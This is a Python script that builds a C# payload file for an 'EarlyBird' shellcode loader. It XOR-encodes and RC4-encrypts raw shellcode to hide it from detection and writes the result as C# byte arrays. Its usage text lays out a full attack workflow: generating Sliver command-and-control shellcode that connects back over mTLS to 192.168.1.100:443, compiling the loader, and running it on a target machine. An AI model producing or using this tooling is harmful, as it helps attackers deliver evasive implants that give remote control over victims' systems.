#!/usr/bin/env python3
"""
EarlyBird Loader XOR + RC4 generatot

Usage: python3 generate_payload.py <shellcode.bin> <xor_key> <rc4_key>
"""

import sys
import os

def rc4_ksa(key):
    """RC4 Key Scheduling Algorithm"""
    key_length = len(key)
    S = list(range(256))
    j = 0

    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        S[i], S[j] = S[j], S[i]

    return S

def rc4_prga(S, data):
    """RC4 Pseudo-Random Generation Algorithm"""
    i = 0
    j = 0
    result = bytearray()

    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        result.append(byte ^ K)

    return bytes(result)

def rc4_encode(shellcode_bytes, key_string):
    """Encode shellcode with RC4"""
    key = key_string.encode() if isinstance(key_string, str) else key_string
    S = rc4_ksa(key)
    encoded = rc4_prga(S, shellcode_bytes)
    return encoded, key

def xor_encode(shellcode_bytes, key):
    """Encode shellcode with XOR"""
    encoded = bytearray()
    for byte in shellcode_bytes:
        encoded.append(byte ^ key)
    return bytes(encoded)

def bytes_to_csharp_array(data, var_name, indent=8):
    """Converts bytes into a formatted C# array."""
    spaces = ' ' * indent
    output = f"private static byte[] {var_name} = new byte[{len(data)}] {{\n{spaces}    "

    for i, byte in enumerate(data):
        output += f"0x{byte:02x}"

        if i < len(data) - 1:
            output += ", "

        # New line every 12 bytes for better readability
        if (i + 1) % 12 == 0 and i < len(data) - 1:
            output += f"\n{spaces}    "

    output += f"\n{spaces}}};"
    return output

def generate_payload_cs(shellcode_path, xor_key, rc4_key_string):
    """Gen complete Payload.cs"""

    print("[*] Early Bird Payload.cs Loader Generator")
    print("="*70)

    # Lire le shellcode
    if not os.path.exists(shellcode_path):
        print(f"[-] Error: File '{shellcode_path}' not found")
        return False

    try:
        with open(shellcode_path, 'rb') as f:
            shellcode = f.read()
    except Exception as e:
        print(f"[-] Error when reading: {e}")
        return False

    print(f"[+] Shellcode readed: {len(shellcode)} bytes")

    # XOR encoded first
    print(f"[+] XOR encoded with key: 0x{xor_key:02x}")
    xor_encoded = xor_encode(shellcode, xor_key)

    # Then RC4 encoded
    print(f"[+] RC4 encoded with key: {rc4_key_string}")
    final_encoded, rc4_key_bytes = rc4_encode(xor_encoded, rc4_key_string)

    print(f"[+] Shellcode Size: {len(final_encoded)} bytes")
    print(f"[+] RC4 key: {len(rc4_key_bytes)} bytes")

    # Générer le fichier Payload.cs
    payload_content = f"""namespace SecureEarlyBird
{{
    /// <summary>
    /// Class containing the encoded payload and the decryption keys.
    ///
    /// Original Shellcode Size: {len(shellcode)} bytes
    /// Encoding: XOR (0x{xor_key:02x}) + RC4 ("{rc4_key_string}")
    /// Automatically generated by generate_payload.py
    /// </summary>
    public static class Payload
    {{
        // Shellcode encoded (XOR then RC4)
        // Original size: {len(shellcode)} bytes
        {bytes_to_csharp_array(final_encoded, "encodedShellcode")}

        // RC4 key ("{rc4_key_string}")
        {bytes_to_csharp_array(rc4_key_bytes, "rc4Key")}

        // XOR Key
        private static byte xorKey = 0x{xor_key:02x};

        /// <summary>
        /// Returns a copy of the encoded shellcode.
        /// </summary>
        public static byte[] GetEncodedShellcode()
        {{
            // Returns a copy to prevent accidental modifications.
            byte[] copy = new byte[encodedShellcode.Length];
            System.Array.Copy(encodedShellcode, copy, encodedShellcode.Length);
            return copy;
        }}

        /// <summary>
        /// Return RC4 key
        /// </summary>
        public static byte[] GetRC4Key()
        {{
            return rc4Key;
        }}

        /// <summary>
        /// Return XOR key
        /// </summary>
        public static byte GetXorKey()
        {{
            return xorKey;
        }}
    }}
}}
"""

    # Sauvegarder le fichier
    output_file = "Payload.cs"
    try:
        with open(output_file, 'w') as f:
            f.write(payload_content)
        print(f"\n[+] File generated: {output_file}")
        print(f"[+] Size of the file: {len(payload_content)} bytes")
    except Exception as e:
        print(f"[-] Error while saving: {e}")
        return False

    # Afficher les instructions
    print("\n" + "="*70)
    print("[+] PAYLOAD.CS SUCCESSFULLY GENERATED! ")
    print("="*70)
    print("\nNext steps:")
    print("  1. Copy Payload.cs into your EarlyBird project.")
    print("  2. Compile with Visual Studio")
    print("  3. Execute on the target :")
    print("     C:\\> EarlyBird.exe")
    print("\n" + "="*70)

    return True

def main():
    if len(sys.argv) != 4:
        print(f"""
Usage: {sys.argv[0]} <shellcode.bin> <xor_key> <rc4_key>

Arguments:
  shellcode.bin   - Fichier shellcode Sliver (.bin)
  xor_key         - Clé XOR (hex, ex: 0xAA)
  rc4_key         - Clé RC4 (string, ex: "MySecretKey2024")

Exemples:
  {sys.argv[0]} payload.bin 0xAA "MySecretKey2024"
  {sys.argv[0]} /tmp/SHARP_COBRA.bin 0xCC "ntdll.dll"
  {sys.argv[0]} shellcode.bin 0x42 "S3cur3P@ssw0rd!"

Workflow complet:
  1. Shellcode Sliver:
     sliver > generate --mtls 192.168.1.100:443 --format shellcode --save /tmp/

  2. Generate Payload.cs:
     python3 {sys.argv[0]} /tmp/SHARP_COBRA.bin 0xAA "MyKey"

  3. Compile the loader:
     csc.exe /out:loader.exe Program.cs Payload.cs

  4. Execute:
     C:\\> loader.exe
""")
        sys.exit(1)

    shellcode_path = sys.argv[1]

    # Parser la clé XOR
    try:
        xor_key = int(sys.argv[2], 0)
        if xor_key < 0 or xor_key > 255:
            print("[-] Erreur: La clé XOR doit être entre 0x00 et 0xFF")
            sys.exit(1)
    except ValueError:
        print("[-] Erreur: Clé XOR invalide (format: 0xAA)")
        sys.exit(1)

    rc4_key = sys.argv[3]

    # Générer le fichier
    if generate_payload_cs(shellcode_path, xor_key, rc4_key):
        sys.exit(0)
    else:
        sys.exit(1)

if __name__ == "__main__":
    main()
